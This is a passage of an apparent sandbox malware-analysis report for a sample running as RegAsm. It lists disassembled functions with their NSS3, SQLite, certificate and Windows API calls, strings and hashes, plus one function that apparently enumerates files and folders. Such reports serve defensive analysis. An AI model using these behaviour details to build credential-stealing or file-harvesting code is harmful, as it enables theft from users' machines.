                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 1169254434-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: aace607cc1bcfa2e5ec5e8e88cd6f799b19c6771626819cb69899302bf7c0bcf
                                                                                                                                                                                                                                                                  • Instruction ID: 8b4d61a533fec62d9d187bdd72c0030ab111f108efb18b1cc4a74ebc36b4c4d7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aace607cc1bcfa2e5ec5e8e88cd6f799b19c6771626819cb69899302bf7c0bcf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41519F71A002059FDB18CFADC990AAEB7B1FF58308F144469E905AB752E731EC91CBA0
                                                                                                                                                                                                                                                                  Function 6C94ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C94ACE6
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C94AD14
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C94AD23
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA2D963
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C94AD39
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                                                                  • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                                                                                                                                                                                                  • API String ID: 332880674-3521875567
                                                                                                                                                                                                                                                                  • Opcode ID: 9ea51f2d0ef67efc78f53c7b1247fef024d26fe2295d17c93792e07642d19268
                                                                                                                                                                                                                                                                  • Instruction ID: 712b23e1171c981a78c69dd38a4f54cf52a3931436cf2000d2ea2d6208021646
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ea51f2d0ef67efc78f53c7b1247fef024d26fe2295d17c93792e07642d19268
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83210334701225DFDB059F649D88BAA37B5BB5631DF04C139E40A97A12DF34D84AC7B2
                                                                                                                                                                                                                                                                  Function 6C928CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(00000000,00000000,?,6C93124D,00000001), ref: 6C928D19
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C93124D,00000001), ref: 6C928D32
                                                                                                                                                                                                                                                                  • PL_ArenaRelease.NSS3(?,?,?,?,?,6C93124D,00000001), ref: 6C928D73
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C93124D,00000001), ref: 6C928D8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,6C93124D,00000001), ref: 6C928DBA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                                  • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                                  • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                                  • Opcode ID: 6398f6f674b4fd6186b6cf40cc4b60e89468192323376e338ecb98a9db47d224
                                                                                                                                                                                                                                                                  • Instruction ID: 38aedb47cde83a346c67db1be5bd393e97f4494c9c13d24cc567ba5ef7809047
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6398f6f674b4fd6186b6cf40cc4b60e89468192323376e338ecb98a9db47d224
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C2191B6A147018FCB08EF38C48456AB7F4FF55308F15896AD9C887709D738D846CB95
                                                                                                                                                                                                                                                                  Function 6C9E4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9E4DC3
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9E4DE0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • misuse, xrefs: 6C9E4DD5
                                                                                                                                                                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C9E4DDA
                                                                                                                                                                                                                                                                  • invalid, xrefs: 6C9E4DB8
                                                                                                                                                                                                                                                                  • API call with %s database connection pointer, xrefs: 6C9E4DBD
                                                                                                                                                                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9E4DCB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_log
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                  • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                  • Opcode ID: 475650e4ddd1eab8da8279cf870205f30ff1cdceac272b9be6f78a0a36811b57
                                                                                                                                                                                                                                                                  • Instruction ID: c55416ed1610a9e98a11b27a736fb8ce22e803ff49aca6a9a5afad26c9cedbfa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 475650e4ddd1eab8da8279cf870205f30ff1cdceac272b9be6f78a0a36811b57
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32F0B421F146647FDB024195CD11F8637AD6F29319F4649E0EE046BA52E215F8D096A1
                                                                                                                                                                                                                                                                  Function 6C950C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?,?,00000000,?,?), ref: 6C950CB3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?), ref: 6C950DC1
                                                                                                                                                                                                                                                                  • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?), ref: 6C950DEC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C912AF5,?,?,?,?,?,6C910A1B,00000000), ref: 6C970F1A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970F10: malloc.MOZGLUE(00000001), ref: 6C970F30
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C970F42
                                                                                                                                                                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?), ref: 6C950DFF
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C951444,?,00000001,?,00000000), ref: 6C950E16
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?), ref: 6C950E53
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3(?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?,?,6C951444,?,?,00000000), ref: 6C950E65
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C951444,?,00000001,?,00000000,00000000,?), ref: 6C950E79
                                                                                                                                                                                                                                                                    • Part of subcall function 6C961560: TlsGetValue.KERNEL32(00000000,?,6C930844,?), ref: 6C96157A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C961560: EnterCriticalSection.KERNEL32(?,?,?,6C930844,?), ref: 6C96158F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C961560: PR_Unlock.NSS3(?,?,?,?,6C930844,?), ref: 6C9615B2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C931397,00000000,?,6C92CF93,5B5F5EC0,00000000,?,6C931397,?), ref: 6C92B1CB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92B1A0: free.MOZGLUE(5B5F5EC0,?,6C92CF93,5B5F5EC0,00000000,?,6C931397,?), ref: 6C92B1D2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9289E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C9288AE,-00000008), ref: 6C928A04
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9289E0: EnterCriticalSection.KERNEL32(?), ref: 6C928A15
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9289E0: memset.VCRUNTIME140(6C9288AE,00000000,00000132), ref: 6C928A27
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9289E0: PR_Unlock.NSS3(?), ref: 6C928A35
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1601681851-0
                                                                                                                                                                                                                                                                  • Opcode ID: ced1eb6228c19fc65b7f57754a1cf9e45fcb0e62ed118e2b7732649c44a3033e
                                                                                                                                                                                                                                                                  • Instruction ID: cf2f777c39854f09cefe5958d308de5723f59690eff178c086f75dd6d10b353b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ced1eb6228c19fc65b7f57754a1cf9e45fcb0e62ed118e2b7732649c44a3033e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5751BAB6E002115FEB00DF64EC41ABB37ACEF6521CF555024EC0997B12F735ED2986A2
                                                                                                                                                                                                                                                                  Function 6C929C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C928850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C930715), ref: 6C928859
                                                                                                                                                                                                                                                                    • Part of subcall function 6C928850: PR_NewLock.NSS3 ref: 6C928874
                                                                                                                                                                                                                                                                    • Part of subcall function 6C928850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C92888D
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6C929CAD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: calloc.MOZGLUE(00000001,00000084,6C900936,00000001,?,6C90102C), ref: 6C9D98E5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C929CE8
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,6C92ECEC,6C932FCD,00000000,?,6C932FCD,?), ref: 6C929D01
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C92ECEC,6C932FCD,00000000,?,6C932FCD,?), ref: 6C929D38
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,6C92ECEC,6C932FCD,00000000,?,6C932FCD,?), ref: 6C929D4D
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C929D70
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C929DC3
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6C929DDD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C930725,00000000,00000058), ref: 6C928906
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: EnterCriticalSection.KERNEL32(?), ref: 6C92891A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C92894A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: calloc.MOZGLUE(00000001,6C93072D,00000000,00000000,00000000,?,6C930725,00000000,00000058), ref: 6C928959
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C928993
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9288D0: PR_Unlock.NSS3(?), ref: 6C9289AF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3394263606-0
                                                                                                                                                                                                                                                                  • Opcode ID: c814b57cdab89d3837f830ede82037ae697f8be5699d612b0f73810452a44c45
                                                                                                                                                                                                                                                                  • Instruction ID: aef4c12bf204000238efda5fe5e5e9dd21f202e0fc48ff94a371194bc532045d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c814b57cdab89d3837f830ede82037ae697f8be5699d612b0f73810452a44c45
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF518475A147058FDB00EF78C0846AABBF4BF55349F168569E8D89BB08DB38E844CB91
                                                                                                                                                                                                                                                                  Function 00416231 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00416236
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041628C
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 004162B2
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 004162D2
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 004162E6
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 004162F9
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041630D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00416320
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: _EH_prolog.MSVCRT ref: 00410CC8
                                                                                                                                                                                                                                                                    • Part of subcall function 00410CC3: GetFileAttributesA.KERNEL32(00000000,?,0040BB15,?,00425C4E,?,?), ref: 00410CDC
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: _EH_prolog.MSVCRT ref: 00415F6F
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415F87
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415F8E
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: wsprintfA.USER32 ref: 00415FA6
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: FindFirstFileA.KERNEL32(?,?), ref: 00415FBD
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: StrCmpCA.SHLWAPI(?,004268EC), ref: 00415FDA
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: StrCmpCA.SHLWAPI(?,004268F0), ref: 00415FF4
                                                                                                                                                                                                                                                                    • Part of subcall function 00415F6A: wsprintfA.USER32 ref: 00416018
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2058169020-0
                                                                                                                                                                                                                                                                  • Opcode ID: 45620498fba386766b7d423dc4813140e04168b4f7615f5946dd0dd2d8eac59e
                                                                                                                                                                                                                                                                  • Instruction ID: 6e61398d1cb73a34fbfb51f2b80dea7b18ee066c05bf19cd4896778ad4286e53
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45620498fba386766b7d423dc4813140e04168b4f7615f5946dd0dd2d8eac59e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9641DDB2C00229ABCF11EBE1DC59EDE777CAF59354F0045AAB505E3051EA78D7C88BA4
                                                                                                                                                                                                                                                                  Function 6C91DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_Now.NSS3 ref: 6C91DCFA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C91DD40
                                                                                                                                                                                                                                                                  • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C91DD62
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C91DD71
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(00000000), ref: 6C91DD81
                                                                                                                                                                                                                                                                  • CERT_RemoveCertListNode.NSS3(?), ref: 6C91DD8F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9306A0: TlsGetValue.KERNEL32 ref: 6C9306C2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9306A0: EnterCriticalSection.KERNEL32(?), ref: 6C9306D6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9306A0: PR_Unlock.NSS3 ref: 6C9306EB
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C91DD9E
